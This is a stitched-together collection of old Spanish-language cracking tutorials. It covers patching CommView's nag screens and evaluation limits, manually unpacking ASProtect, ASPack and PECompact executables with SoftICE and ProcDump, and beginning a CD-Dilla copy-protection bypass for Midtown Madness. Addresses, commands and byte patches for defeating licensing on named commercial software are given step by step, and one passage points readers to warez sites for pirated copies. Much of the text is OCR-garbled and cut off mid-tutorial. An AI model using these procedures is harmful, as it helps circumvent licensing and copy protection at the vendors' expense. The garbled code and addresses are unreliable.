004DA8DC 
004DA8DD 
004DA8E2 


crack9: 


loc_4D8F3B: 


crack10: 


sub_4894A0 


crack11: 


test 


nop 
nop 

Call 
retn 


eax, ds:dword_4E02EC 
byte ptr [eax], 1 


short loc_4DA5AB ¿parchalo a jump 


sub_4D03AC 
ecx, [ebp-4] 


; CODE XREF: CODE:004D8F11 3 
sub_4894A0 
al, al 


short loc_4D8F7D ¿parchalo a jump 


eax, ds:dword_4E02EC 
byte ptr [eax], 1 


al, al 


¡ parchalo a nop 


sub_4D085C 


-mitad de los paquetes desplegados: una forma facil con IDA, solo encuentra la referencia a la cadena: 


0048B5A4 
0048B5A9 
0048B5AC 
0048B5AF 
0048B5B3 
0048B5B3 
0048B5B4 
0048B5B5 
0048B5B8 
0048B5BB 
0048B5C0 
0048B5C2 
0048B5C2 
0048B5C5 


0048B5CA 


push offset loc_48BB1C 

push dword ptr fs: [eax] 

mov fs: [eax], esp 

cmp byte ptr [ebx+5Fh], 0 

nop ; nopea esos para que nunca salte a 48b5c2, adivinas por que? 
nop 

lea edx, [ebp-14h] 

mov eax, [ebx+22h] 

call sub_48A7C0 

jmp short loc_48B5CF 

lea eax, [ebp-14h] 

mov edx, offset aDataThisEvalua ; "DATA: THIS EVALUATION VERSION 
DISPLAYS O"... 

call sub_403E08 


tienes 2 lugares mas para hacer lo mismo, encuentralos y corrige el *bug*. 


La mol 


004597 
004597 
004597 
004597 
004597 
004597 


lesta nag cuando sales de commview: la encontre despues de un bpx to createwindowsexa, 


8 
8 
8 
B 
D 
E 


004597 


F 


00459720 
00459721 


loc_459718: 


mov 
mov 
nop 
nop 
nop 
nop 
nop 


; CODE XREF: sub_45969C+6C 3 
; sub_45969C+70 3 

eax, [ebp+tvar_C] 

edx, [eax] 

Tienes que nopear este Call para evitar la nag 


tienes que presionar F12 un monton de veces para encontrar esta rutina: 


00459722 nop 

00459723 mov [ebp-8], eax 
00459726 xor eax, eax 

00459728 pop edx 

00459729 pop ecx 

0045972A pop ecx 

0045972B mov fs: [eax], edx 
0045972E push offset loc_459743 
00459733 

00459733 loc_459733: ; CODE XREF: CODE:00459741 3 
00459733 mov eax, [ebp+var_C] 
00459736 Call sub_403024 
0045973B retn 


Ahora puedes disfrutar tu nuevo portsniffer, auto reconstruido por él mismo, justo como debería ser siempre. 


| Notas Finales 


Necesito tu reatroalimentación sobre este ensayo, asi que escribe tus comentarios en el msgboard : http://www.insidetheweb.com/mbs.cgi/mb155985 


Puedes unirte a todos los forums de reversers en sandman, donde tuve esta idea: http://www.insidetheweb.com/mbs.cgi/mb628842 


O en el msgboard de fravia, para intermedios y avanzados: http://www.insidetheweb.com/mbs.cgi/mb155985 


Gracias a Eternal Bliss ,r!sc y SV por su trabajo preliminar en este interesante objetivo. 


+Tsehp 


| Ob Duh 


No te molestaré explicando que deberias comprar este programa objetivo si intentas usarlo por un periodo mas largo que el permitido. Deberias ROBAR este software en cambio? no necesitas crackear su esquema de protección del todo: lo 
encontrarás en la mayoria de Sites de Warez, completo y ya registrado, adiós, no regreses. 


Estas muy dentro de reverser's page de ingerieria inversa, escoge tu camino hacia afuera: 


[homepage Lredlinks Erebearch_forms Lelrorc Erhow to protect Ledo cademy database 
[rebeatity cracking Ehow to search [redjavascript wars 
ools Eelinonymity academy ocktails Eebntismut CGE:scripts ail_reverser 
[relis reverse engineering legal? 


Desempacando archivos empacados/protegidos con el nuevo ASProtect 
Un tutorial traido a ti el 17 de Julio - por Predator [PC/pGC] 
Traducido por “[G]oLe[E]? 


Hola allí!!! Antes les expliqué como podían parchear un programa inline, que estaba empacado con ASProtect. Poco 
tiempo después que mi tutorial salió a luz, el autor de ASProtect actualizó su programa por lo que mi tutorial se hizo 
obsoleto. Por un largo periodo de tiempo, el nuevo ASProtect no fue vencido. La única solución fue el MemPatch 
Server (c) de Ivanopulo, pero es una herramienta privada. Entonces, como hacemos los crackers para tratar con esta 
nueva versión de aspr? y tengo la respuesta, y te la mostrare en este tutorial. 


PROGRAMA OBJETIVO: AD Picture Viewer v1.32 
http://abroaddesign.hypermart.net/picview/picview.zip 


Bueno, ahora nuestra misión es desempacar un programa objetivo que ha sido empacado con ASProtect - y el archivo desempacado debe 
ejecutarse perfectamente. Para lograr este resultado, tenemos que ir a través de los siguientes pasos: 


e Localizar el "Original Program Entry Point" (Punto de Entrada Original del programa, referido de ahora en adelante como OEP) 
e Descargar el programa completo de la memoria. 
e Arreglar el PE para que corra en lugar de cerrarse. 


Por favor, lee para una descripción detallada de como hacer esto. 


Localizando el OEP - Punto de Entrada Original del Programa 


[MI IDEA] Basicamente, trabaja así. Pensé que los bytes en el OEP serian desempacados/tratados primero y antes de los otros bytes, por el 
esquema de desempaquetado del ASPR. Estaba en lo correcto :) -- ejecuté un programa, escribi/recordé una dirección (cualquier RVA, eso 
es todo) y fije un BPM en él. Cuando ASPR lee/escribre a este RVA por primera vez, bpmX en la linea de código que hizo eso y re-ejecutamos 
la aplicación otra vez. Noté que los primeros bytes vistos que escribió, fue a la RVA del OEP! ----- Fui desafortunado, estaba en algo como un 
'trance' mientras hacia esto y tengo miedo porque ya olvidé el proceso -exacto- . Sin embargo, con la forma descrita abajo, el OEP no 
debería ser difícil de encontrar, quiza mas fácil. Y Adivino que iré en trance de nuevo y encontraré lo que hice antes.. LOL. 


[DECIR QUE] Quiza si has tratado, encontrarás que rastrear desde el punto de entrada del archivo empacado no es buena idea ya que 
tomaría horas y horas. Entonces, como demonios localizamos el OEP? no es tan complicado una vez que sabes como hacerlo. 


[HAGAMOSLO] Lo primero con lo que hay que tratar es cuando corremos el programa, hay un malintecionado chequeo de SoftICE. 
Olvidemoslo rapidamente y descarguemos el IcePatch (gran herramienta) de http://protools.cjb.net/ por ejemplo. Si no sabes como usar 


esta herramienta, no me preguntes, lee el readme o algo. Okas, no mas chequeos de SoftICE. que sigue? 


Vamos a escribir el RVA de algun código desempacado, en cualquier parte. Ejecutamos PicView, vamos al menú '?' y clickeamos en 'About". 
Ahora entra a SoftICE, y fija un bpx en la API 'ShowWindow' (bpx ShowWindow). Ahora cierra el about, y softice aparecera -presiona F12 
hasta que estes en el código de PicView. La dirección que escribí para mi, era "449EEE" y tu puedes hacerlo también. Okas, no salgas del 
SoftICE todavia, escribe: BPM <La_RVA_que_escribiste>. Por ejemplo, si estas usando la misma RVA que yo, sería: BPM 449FEE. Ahora 
cierra PicView y ejecutalo de nuevo. SoftICE hará un break (por supuesto) - ahora sigue estas instrucciones de forma exacta: Presiona F5 7 


veces. Una vez que hiciste esto, presiona F12 2 veces. Ahora aterrisaras en la siguiente pieza de código y por favor, recuerda que casi 100% 
seguro que el RVA será diferente en tu computadora, ya que al parecer, ASPR usa RVA 's aleatorios :) - Code snippet: 


0167:0059D51C [es13 amp 0059D531 
0167:0059D51E [E9FSOSFFFF ome 0058DB18 
0167:0059D523 [66B80E0O [mov AX,000E 
0167:0059D527 [ESDAFIFEFF [CALL 0059C700 
0167:0059D52C [E88308FFFF [CALL 0058DDB4 


0167:0059D531 [8pasos [mov EAX,[EBP+08] 
0167:0059D534 [8D4818 [LEA ECX,[EAX+18] 
0167:0059D537 [884508 [mov EAX,[EBP+08] 
0167:0059D53A [8810 [mov EDX,[EAX] 
0167:0059D53C [884508 [mov EAX,[EBP+08] 
0167:0059D53F [sBao1C mov EAX,[EAX+1C] 
0167:0059D542 |ESSDF7FFFF [CALL 0059CCA4 
0167:0059D547 E [Por EDI 
0167:0059D548 ES [pop ESI 


0167:0059D549 ES [pop EBX 

¡IRA RA 
¡IB A RRA 
¡IB A Ra 
¡O A RR 


Ahora, rastrea la llamada (F8) en la dirección 59D542 (de nuevo: la dirección en tu computadora será diferente) - y rastrea un poco (F10). 
Muy pronto verás la siguiente línea de código: 8B45F8 MOV EAX,[EBP-08] 


Ahora, pasa a través de esa línea de código y mira EAX - contiene el OEP, eso es baby! para este objetivo, el OEP = 4E3DF8 


Volcado de Memoria 


Okas, así que sobreviviste a la parte 1. Ahora movamos nuestros traseros a la parte 2. 


Volcamos 2 archivos separados, y vamos a usar IceDump (obtenlo en protools, para la URL ve arriba en este tutorial). El archivo 1 será la 
imagen entera y el archivo 2 será la Tabla de Importación intacta. Despues los uniremos e iremos al paso 3. 


Enciende ProcDump y corre el PE-Editor sobre PicView.exe. Tendrás que recordar el RVA de la Imagien base y el tamaño de la imagen por 
ahora. Okas, ahora tienes que correr PicView de nuevo y hacer que Softlce rompa en el OEP. Una forma posible de hacer esto, es algo asi: 


1. Hexedita PicView.exe y en el Punto de Entrada, pon un byte nuevo (CCh) y recuerda el antiguo (en este caso, 60h). 
2. Escribe bpint 3 en SoftICE - y ahora ejecuta PicView y SoftICE lo romperá. Escribe "EB EIP 60" para restaurar el byte original. 


3. Escribe: BPM <Dirección_del_OEP> X. para este objetivo, sería: BPM 4E3DF8 X. Ahora presiona F5 y SoftICE romperá en el OPP! 


Okas, volquemos la imagen ahora. Si usas una versión antigua de IceDump, escribe en SoftICE: pagein d <RVA_de_la_imagenbase> 
<Tamaño_de_la_imagenbase> <nombre_del_archivo>. 

Para este objetivo especifico, la línea de comando sería: pagein d 400000 144000 c:1templimage.exe 

Pero por supuesto, si ejecutas el nuevo IceDump, tendrás que remplazar "pagein d" por "/dump" 


Ahora la parte 2 del paso 2: Descargamos la Tabla de Importación intacta. Primero ve el editor PE del ProcDump de nuevo (no lo cerraste, o 
sí?) y haz click en "sections". La sección ".idata" es la que nos interesa, y lo que queremos saber es el RVA de .idata y el tamaño virtual de 
él. Para este objetivo, el RVA = E9000 y el vsize (tamaño virtual) = 3000. 


Okas, descarguemos la tabla entonces! limpia los breakpoints del SICE y escribre: bpx LoadLibraryA (ya que este es una de las API's que 
ASProtect tiene que usar para inicializar la Tabla Real de Importación). Ahora ejecuta PicView de nuevo y SoftICE romperá. Presiona F12, 
ahora estas en algún código de ASProtect. Descarga la Tabla de importación escribiendo: pagein d 
<RVA_del_idata+RVA_de_la_imagenbase> <Tamaño_del_idata> <nombre_del_archivo> (si usas un IceDump nuevo, reemplaza "pagein d” 
con "/dump"). --- Para este ejemplo, la línea de comando vendría a ser: pagein d 4E9000 3000 c:1templidata.dat 


Ahora el paso 3 de la parte 2: tenemos que fusionar el exe descargado la Tabla de Importación intacta. En mi opinión, la mejor forma de 
hacerlo es usando Hex Workshop (www.hexworkshop.com) y abrir nuetro "¡magen.exe". Ahora ve al offset de .idata el que en nuestro 
ejemplo es: E9000. Selecciona el mismo numero de bytes como el tamaño de nuestra nueva Tabla de Importación (en nuestro ejemplo: 
3000) usando Shift y PageDown/Las Flechas del Cursor o algo... y vamos a: "File -> Replace by file" y seleccionamos el archivo "idata.dat" . 
Ahora, los bytes en image.exe serán actualizados por idata.dat. Fusión Completada! 


Ultimo paso: editar el encabezado PE para que el programa se ejecute y no se cierre 
Sientes como nos estamos acercando al final de este Tutorial? Bien, espero que sea así porque mis dedos comienzan a doler ;) 


Necesitamos hacer algunos cambiós al nuevo imagen.exe usando el PE-Editor del ProcDump. Cargamos imagen.exe en él. Lo primero a 
cambiar es el PEP. Recuerdas que escribiste el OEP? Ahora resta la imagenbase de él (usualmente 400000, ve ProcDump) y has obtenido el 
Punto de Entrada que debes ingresar en ProcDump. Para este programa sería: 4E3DF8 - 400000 = E3DF8 = Punto de Entrada. 


Segundo, haz click en "directory" y cambia el RVA (no el tamaño, solo el RVA) de la Tabla de Importación (de nuevo, en este ejemplo: 
E9000). Presinoa OK y ahora entra a "Sections". Para ser capaz de desensamblar el archivo desempacado, comienza por editar la sección 
"CODE" (bien, la primera sección del archivo y en este caso, es CODE (código)) y cambia las Caracteristicas de Sección de COOOO040 a 
E0000060. Ahora, el PSize debe ser hecho Igual al VSize y el Offset debe ser hecho igual al RVA -- Esto es debido al hecho de que el archivo 
ahora está desempacado y comenzamos a descargar la imagen del RVA 400000. Así, en este ejemplo, para la sección CODE, el PSIZE == 
VSIZE == E3000. Ademas, el OFFSET == RVA == 1000. Ahora presiona OK. Aquí vienen las malas noticias (Oh bueno.. no tan malas) : 
Tienes que hacer esto para cada sección que tenga el archivo, esto también significa hacerlo para .DATA y .ASPR etc. Siempre copia el VSIZE 
sobre el PSIZE y despues de eso, copia el RVA sobre el OFFSET. Una vez hayas terminado todo, presiona OK. Presiona OK otra vez y puedes 
salir tranquilamente del ProcDump. 


Hey, estamos hechos!! trata de correr el archivo desempacado (imagen.exe) - correra perfectamente, no hay problema - y puedes 
desensamblarlo. 


Otra vez ASProtect está completamente muerto. Maldita sea, cuantas veces tenemos que aclararle a los autores de 
software que las protecciones comerciales ya hechas son una porqueria y realmente apestan. 


Bien, estoy un poco cansado ahora.. por lo tanto, dejare de escribir - pero primero quiero saludar y darle creditos a R!sc 


Karpoff Spanish Tutor 


Programa: Aspack.exe 


PROTECCION: El archivo está enpacado y no puede ser editado 

Descripcion: Tal tal tal 

Dificultad: Si sigues bien los pasos es fácil, pero hay que aprender, no copiar 
DOWNLOAD : http: //xxxx 

Herramientas: Softice, editor de encabezado PE (recomiendo Procdump) 

CRACKER: R!SC FECHA: E A A 


INTRODUCCION 


Algo de teoría 


Un compresor o encriptador de archivos PE (portable executable) tiene que agregarle al exe comprimido/encriptado el código 
descompresor/desencriptador. Si encripta/comprime la tabla de importaciones, tiene también que cargarla (punto de ataque). También, 
mientras el exe se carga, tiene que tener suficiente memory reservada para descomprimir/desencriptar el código/datos (más un bit de 
más para su propio código(y por ahí más, para los datos comprimidos)). No sabemos el tamaño del programa en sí, pero mirando a la 
cabecera podemos obtener el tamaño del proceso, que será lo suficientemente amplio para que el proceso se cargue/desempaque en ella 
y corra. 


Yo, cuando desempaco un archivo, trato de detectar la tabla de importaciones antes de que sea iniciada, la vuelco a disco (dump), 
después traceo hasta el punto de entrada original y vuelco también el resto del proceso. Los pego juntos, y luego arreglo la cabecera y 
trabajo hecho. Algunos packers, dejan los segmentos en la cabecera, haciendo que encontrar la dirección virtual para la tabla de 
importaciones realmente fácil, otros "desaparecen" las secciones para crear una vacía para desempacar los datos comprimidos, y una 
última sección conteniendo su propia tabla de importación, ícono, código de desempaque, etc... Es un trabajo fácil, pero se necesita un 
acercamiento diferente, que será probablemente cubierto en el número dos de estos tutoriales. 


AL ATAKE 


Primera parte 


Ensuciándonos las manos. 


Bien, prendomos el editor PE del ProcDump y saquémosle algo de información a nuestro blanco. Queremos el tamaño del proceso y si es posible, el 
yamúño y dirección virtual de la tabla de importaciones. Por suerte, en este archivo, cada sección ha sido dejada intacta. 


Así verás en el editor PE: 

Size of image : 00079000 ; Cuanta memoria reservar para este archivo pe 

Image Base : 00400000 ; bah 

.idata 

Virtual Size : 00002000 ; tamaño de idata en la memoria 

Virtual Offset : 00046000 ; Dirección virtual de idata (+Image Base == 00446000) 
.rdata 

Virtual Size : 00001000 

Virtual Offset : 00049000 


Bueno, será un mal momento para decir esto, pero me cago en esto. La tabla de importaciones podría estar en .idata, or en .rdata. Mirando sus 
tamaños, pondría mi dinero por .idata. 


Parte 2 
Volcando una virgen (la tabla de importaciones: ) 


Prendamos el Frogsice, ya que esta versión de .aspr tiene algo de trucos anti-softice. Ponemos un bpx en LoadLibraryA, and run aspack.exe...... 
Cuando Sice salte, chequea la memoria en 446000 y 449000, para ver si la tabla de importaciones ha sido desempacada. 


:bpx loadlibrarya 

Break due to BPPX KERNEL32!LoadLibraryA 

Break due to G 

¿dd 446000 1 40 

0030:00446000 00000000 00000000 00000000 00046609C ............. 1 
0030:00446010 0004612C 00000000 00000000 00000000 5a.............. 
0030:00446020 000468B6 000461AC 00000000 00000000 .h...a.......... 


0030:00446030 00000000 000468D0 000461B4 00000000 .....h...a...... 


Bien!!, 446000 no son todos ?? ?? 92 9?, lo que significa que ya ha sido desempacada! Y las mejores noticias son que se ve exactamente como lo que 
buscamos. Los descriptores_de_importacion_de_imagen, una estructura de 5 palabras (words, de 2 bytes) conteniendo los punteros a el 
primer_thunk, , y primer _thunk_original. (por supuesto, no en ese orden). Sigue la parte aburrida: 


¿Cual es el formato de los descriptores_de_importacion_de_imagen? Bueno, contienen 5 dobles palabras (dword, 4 bytes), y.... sigue leyendo. 


Dd offset del primer_thunk_original 
Dd estampa de tiempo y fecha 

Dd forwardchain 

Dd offset del nombre_de_librería 
Dd offset primer_thunk 


Timedatestamp y forwardchain son usualmente puestos en cero, el primer_thunk_original no es necesario, ya que es una copia exacta del 
primer_thunk. nombre_de_librería es el puntero al nombre de la librería :d y el primer_thunk es el array de los ascii's. Es entonces el primer_thunk el 
que se sobreescribe con las direcciones de las apis de la tabla. Los descriptores _de_ importacion _de_ imagen se terminan con cinco dobles palabras 
NULL (de valor 0). Una buena pista para encontrar esto es buscar el comienzo del primer_thunk (que contendrá o los punteros a los asciis o la 
verdadera dirección de la api (xx xx F7 BF o algo para las apis dl kernel (en 9x))), o buscar un nombre de librería, luego, usando la dirección de ese 
nombre, puedes encontrar los descriptores_de_ importacion_de_imagen. 


Solo una pequeña sesion de ingerniería inversa para nuestros descriptores _de_ importacion _de_ imagen: 
¿dd 446000 1 40 

0030:00446000 00000000 00000000 00000000 00046609C ............. f. 

0030:00446010 0004612C 00000000 00000000 00000000 5a.............. 

46609c es el puntero a nuestro nombre de librería (RVA, debes sumar la imagebase) 

:db 44669c 110 

0030:0044669C 4B 45 52 4E 45 4C 33 32-2E 44 4C 4C 00 00 00 00 KERNEL32.DLL.... 

y 4612c es el puntero al firstthunk para esa librería 

:dd 44612c 110 

0030:0044612C 000466AA 000466C2 000466DA 000466F2 .f...f...f...f.. 


estos son punteros a los asciis, los nombres reales de las apis. Pero apuntan a dos bytes antes que los asciis, a la HINT . . 466%a es la primera api a 
cargar, 


46602 es la segunda .. Terminada en NULL, con una simple doble palabra. 

:db 0004466aa 120 

0030:004466AA 00 00 44 65 6C 65 74 65-43 72 69 74 69 63 61 6C ..DeleteCritical 
0030:004466BA 53 65 63 74 69 6F 6E 00-00 00 4C 65 61 76 65 43 Section...LeaveC 


Bueno, esa es definitivamente nuestra vigen tabla de importaciones.Abajo con ella!! démosle dump, y recuerda la dirección de los descriptores de 
importacion de imagen. 


:pagein d 446000 2000 cudaspack.idata.bin (en el softice) 
Parte 3 
Dumpeando el resto y arreglando el encabezado. 


Bueno, supongo que sabrán como seguir la ejecución de un programa (trace, F10 o FS). Breakpoint en loadlibrarya. Poner puntos de ruptura en 
hardware (hardware breakpoints) antes de pasar sobre una call ayuda bastante, ya que estos bp's no parchean la memoria con un CC (int03h), no son 
sobreescritos cuando se desempacan datos sobre ellos. 'bpm <dirección> x'. Todo el código del desempacador parece estar alrededor de OOC1xxxx. 
Entonces, si encontramos saltos a direcciones menores, es probable que el código original se encuentre allí. 


:bpm cl10da8 x 


Break due to BPMB ++016F:00C10DA8 X DR3 


:u eip 130 


0167:00C10E98 89C4 MOV ESP,EAX 


0167:00C10E9A 89D0 MOV EAX,EDX 


0167:00C10E9C 8B1D6C66C100 MOV EBX,[00C1666C] 


0167:00C10EA2 89041C MOV [EBX+ESP],EAX 


0167:00C10EAS 61 POPAD 


0167:00C10EA6 50 PUSH EAX ; push 442b98 


0167:00C10EA7 C3 RET ; ret a esa dirección.... mmmm 


:2eax 


00442B98 0004467608 "D+"" 


:u eip110 


0167:00442B98 55 PUSH EBP 


0167:00442B99 8BEC MOV EBP,ESP 


0167:00442B9B 83C4F4 ADD ESP,-0C 


Que bueno que se ve esto... Anotemos esa dirección (el punto de entrada origina) vlolquemos a disco el proceso entero entonces..... sería mejor si 
borráramos los bp's que pusimos (bc*). 


:pagein d 400000 79000 c:daspack.volcado.exe 


ahora tenemos que pegar la tabla virgen en este dump que hicimos... arreglar el encabezado y listo!!! 


Ya que el volcado lo hicimos desde 400000, los offsets de archivo (file offsets) serán iguales a las RVAs (o simplememnte las direcciones). Nuestra 
tabla de importación estaba en la RVA 46000, Entonces estará en el mismo offset... (46000 para aquellos que no la han cachado). 


Usa un editor hexadecimal para copiar los 2000 bytes de aspack.idata.bin' sobre los 2000 bytes de datos en 'aspack.dumped.exe", 


Desde el offset 46000 al 48000 .. .. 


Psize==vsize => Tamaño físico = Tamaño virtual 


Offset==rva => Dirección física = Dirección virtual (en memoria) 


Entonces cada offset será equivalente a su RVA ahora. 


.CODE RVA : 00001000 ... CODE nuevo file offset : 00001000 


Cada tamaño virtual será igual al tamaño físico de esta sección a menos que . . (Son normalmente alineados en una límite de 1000h bytes. El tamaño 
virtual podría ser 45001,pero cuando windows lo carga, reservaría 46000h bytes para esta sección) 


CODE virtual size : 00042000 .. CODE nuevo RAW size : 00042000... 


Entonces, ve y arregla el encabezado, con el Procdump... Si lo has hecho bien, , cuando salves los cambios y refresques el explorer, el ícono estará 
de vuelta en su lugar. 


Hay dos cosas más que arreglar antes de que funcione . El punto de entrada del programa y la ubicación de la tabla de importaciones 


El nuevo punto de entrada es 00042B98 . (Punto original de entrada - base de la imagen) 


Haz click en el botón 'directory para editar la dirección de la tabla de importaciones. 


La nueva RVA de la tabla de importaciones es--> 46000 . (Rva de los descriptores _de_ importacion_ de_la_imagen) 


¿Tamaño de la tabla de importaciones? Probablemente mayor que cero :b 


Guarda los cambios, sal del procdump, cruza los dedos... y ejecuta aspack.volcado.exe 


Bueno, anda, anda dulcemente. . No está totalmente resaturado, todavía tenemos el viejo código del empacador y la sección de recursos está medio 
magullada todavía, con algunos recursos movidos a la sección .aspr también. Jeh No puedes desensamblar el archivo!!!!. Edita las características de 
la primera sección, pasalas de COO00060 (datos, escribibles) a 60000040(código, ejecutable) o E0000060 (codigo, datos, etc...) 


Fin de este hermoso tutorial 
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Tutorial Número 33 


Escrito por Etenal Bliss 

Email: Eternal_Bliss hotmail.com 

Página Web: http://crackmes.cjb.net 
http://surf.to/crackmes 

Fecha: 26 de Febrero del 2000 


Detalles del programa: 
Nombre: Notepad.exe empaquetado con PECompact 1.24.1 


Herramientas usadas: 
ProcDump 

Softice 

Symbol Loader 


Método de Crackeo: 
Desempaquetado 


Método para ver: 
Usar Notepad con ajuste de línea marcado. 
Resolución 800 X 600 píxeles (Opcional) 


Acerca de este sistema de protección 


Notepad.exe empacado con PECompact 1.24.1 
(opción: máxima compresión, librería JCALG1) 
Meta: Desempacarlo manualmente 


Acerca de este tutorial 


Este tutorial te mostrará cómo desempacar programas empacados utilizando PECompact 1.24.1. 
El objetivo es notepad.exe, disponible en la mayoria de los ordenadores. 

Como todavía no soy muy bueno explicando ciertas cosas en el desempacado, solo 

puedo intentar mostrarte lo mejor posible el método simple. La tabla de importación y 

los materiales no los voy a dar aquí. Este método de desempacado te permitirá correr el 
programa y parchearlo. 

Para un método más avanzado, tendrás que leer otros tutoriales. 


Buscando el Punto de Entrada del programa 
Abrir el notepad.exe empacado con Symbol Loader. 


Clic en el 2” icono en Symbol loader que dice 
"Load the currently open module" "Carga el módulo actualmente abierto" 


Obtendrás un mensaje de error y preguntará si quieres cargar el 
ejecutable de todos modos. Clic en "Sí". 


Si Softice está cargado, debería romperse en el punto de entrada del programa. 


He pegado los códigos siguientes y los he comentado. 


ii o O A O 


**Tu estarás aquí cuando Softice se rompe. Manten presionado F10 para tracear los códigos. 


0040AC44 FEFEF INVALID 
0040AC4C 9C PUSHFD 
0040AC4D 60 PUSHAD 


0040AC4E ES02000000 CALL —0040AC55 
**S1 atraviesas esta CALL usando F10, el programa correrá. 
Así, recarga el programa y el paso a esta CALL usando F8 la próxima vez. 


Mientras traceas, experimentarás muchos saltos condicionales e 
incondicionales. Hay muchos bucles que tendrás que evitar 
a no ser que quieras tracear por ellos muchas veces. 


por ejemplo: 
O OOOO 


daadaaada 


WWWWWWWW 

XXXXXXXX JNZ ZZZ2ZZZZ <-- Bucle hacia atrás a aaaaaaaa 
yyyyyyyy JMP aaaaaaaa 

77777777 Nuevas instrucciones 


Si sigues traceando, saltarás atrás a aaaaaaa muchas veces. 
Para ahorrar tiempo, bpx en ZZZZZZzz y entonces pulsa FS para volver 
a Windows y permitir al programa correr hasta que se alcance ZZZ77ZZZ, 


Así evitando la necesidad de tracear por el bucle una y otra vez. 
Ale ole le e ole le o ole ole a ole ole a ole ole o ole ole e ole ole a ole ole e ole le a ale 


Finalmente, encontrarás por casualidad esta sección. 


0040CA83 8BBD2E744000 MOV — EDI [EBP+0040742E] 
0040CA89 ES5E040000 CALL — 0040CEEC 


0040CASE 61 POPAD 

0040CASF 9D POPFD 

0040CA90 50 PUSH  EAX 
0040CA91 68CC104000 PUSH  004010CC 
0040CA96 C20400 RET 0004 


Cuando comencé a aprender a desempacar, Siempre que encuentro por 
casualidad POPAD o POPFD, Me alerto. Como en los anteriores 2 tutoriales, 
004010CC aparece otra vez para notepad.exe. Esto es el punto de entrada 
original para el notepad.exe empacado. 


Así, en el RET en 0040CAD6, tipo: 
a elp (y pulsa Enter) 

jmp eip (y pulsa Enter) 

ES 


Esto cambia los códigos en 0O40CAD96. Notarás que después de teclear 

"mp eip” y pulsando Enter, la instrucción en 0O40CA96 es ahora un JMP. 
Esto hará efectivamente el programa "pausa". Pulsando FS te permite volver 
a Windows y puedes volcar el programa desempacado en tu disco duro. 


Utilizando ProcDump, botón derecho en la primera lista y elige "Refresh list" 
"Refrescar lista". 

Busca el notepad.exe empacado y botón derecho en él. 

Elige "Dump (Full)" "Volcar (Completo)” y sálvalo. 

Botón derecho en él otra vez y elige "Kill Task" "Cerrar Tarea". 


Cambiando el Punto de Entrada 


Si recuerdas, el punto de entrada del notepad.exe desempacado es 004010CC. 
Usando la función PE Editor del ProcDump otra vez, abre el notepad.exe 
desempacado. 


Bajo "Header Infos", verás que el punto de entrada es 0OODAC44 que es erroneo. 
Consulta mi tutorial 31 sobre cómo cambiar el punto de entrada a 004010CC. 


Ahora, ejecuta el notepad.exe desempacado. 
Esto debería correr. 8) 


Notas Finales 
Este tutorial está dedicado a todos los newbies como yo. 
Doy las gracias y mi gratitud a :- 
MIZ de quien aprendí lo básico del desempacado. 


A todos los escritores de Tutoriales de Cracks y CrackMes 
y también a todos los crackers que han estado apoyando mi página y proyecto de foro. 
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CDilla Cracking: 
MidTown Madness versión Francesa: Otra aproximación a cdilla 


Tutorial de ACiD BuRN [Immortal Descendants] 
(Octubre 6, 1999) 
Traducción de "[G]oLe[E]? 
(Octubre 26, 2000) 


Herramientas: * CD Original de Midtown madness 
* Soft ice 3.23 
* Herramienta soft ice para parchar sice (usado para volcar secciones) 
* Hexwork shop 
* Frog ice (para ocultar soft ice) 
* Procdump (como PE Editor) 
* Exescope 


Introducción: 


Hola todos, sé que ya hay un tutor sobre Midtown madness por black check 

pero la forma de crackearlo no es la misma que la suya, y explicaré mas cosas 

que las que el hizo sobre pegar nuestras secciones volcadas en el exe crackeado :) 
también asumo que lees este tut, y sabes algunas cosas sobre el formato de archivos PE... 


Pateemosle el trasero a cdilla: 


Después de instalar tu pequeño juego, PE edita los archivos ".icd" con procdump. 
(Enciende procdump, haz click en PE Editor, ojea tu archivo ".icd", allí está 
Midtown.icd ... 

ahora, Debes ver: 


- Entry Point : 00166C10 
- Image Base : 00400000 


Okas, necesitaremos el OEP (Punto de Entrada Original) despues, para tenerlo para sumarlo 
a la Image base y el Punto de Entrada que obtuviste con procdump: 
00400000 + 00166C10 = 566C10 


ahora, haz click en el boton "sections" para ver todas las secciones del archivo: 


solo necesitaras tener los valores del Virtual Offset, Raw Size, y Raw Offset! 


- para la sección ".text": 


Virtual Offset: 00001000 
Raw Size: 18D78F 
Raw Offset: 600 


- para la sección ".Rdata": 


Virtual Offset: 0018F000 
Raw Size: 14C99 
Raw Offset: 18DE00 


- para la sección ".data": 


Virtual Offset: 00144000 
Raw Size: 3D8A4 
Raw Offset: 1A2C00 


- para la sección ".datal": 


Virtual Offset: 00314000 
Raw Size: 20 
Raw Offset: 1E0600 


- para la sección ".rsrc": 


Virtual Offset: 00315000 
Raw Size: CB3 
Raw Offset: 1E0800 


Ahora descargaremos todas las secciones del archivo ".icd”, excepto la ".Rdata", Despues sabrás el por qué.... 
btw , necesitas sumar el image base al Virtual Offset de todas las secciones: 


.text : 400000 + 00001000 = 00401000 
.rdata : 400000 + 0018F000 = 0058F000 
.data : 400000 + 00144000 = 00544000 
.datal : 400000 + 00314000 = 00714000 
.rsrc : 400000 + 00315000 = 00715000 


okas, ahora vamos a descargar todas las secciones (excepto .rdata) 

Para esto, necesitaremos poner un breakpoint en el EOP (566C10 para nosotros) 
btw , asumo que leíste el tut de black check, y que parchaste tu Frog ice para 
ocultar tu SoftICE, si no, ve y lee antes ese buen tut... 


Enciende tu Frog ice parcheado y ejecuta tu juego original. 

verás un pequeño video, en este momento, haz aparecer SoftICE (ctrl+D), y fija 

un bpx en el OEP: Bpx 56CC10 para este juego! 

Presiona FS para hacer correr el juego de nuevo y cerrarlo de nuevo... 

ahora, ejecutalo, y normalmente rompera en 56CC10, si no lo hace, vé si fijaste el bpx 

en el lugar indicado (bl: debes obtener algo como esto: H+025F:56CC10) 

asumo que rompió, ahora debes poder volcar todas las secciones. 

Antes del volcado, desactiva todos tus bpx, no queremos shit en nuestras secciones volcadas... 
El comando pagein trabaja así: 


mo "ma 


pagein "dirección para comenzar” "tamaño" "nombre del archivo" 


entonces, solo escribe esto en soft ice: 


pagein 401000 18D78F c:Mtext.bin 
pagein 5A4000 3D8A4 cidata.bin 
pagein 714000 20 cadatal.bin 
pagein 715000 CB3 c:rsrc.bin 


okas, esto volcó las secciones a nuestro disco duro!! 


ahora, tenemos que hacer la parte "nice"!! volcando nuestras secciones rdata sections, 
pero no es como las otras!! 
primero que todo, tienes que obtener la dirección real de la función, porque rastrearemos dentro de el call a nuestra sección rdata. 


Despues de romper, aterrizamos aquí: 


00566C10 PUSH EBP <-- Rompemos aquí, En el Punto de Entrada 

00566C11 MOV  EBP,ESP 

00566C13 PUSH FF 
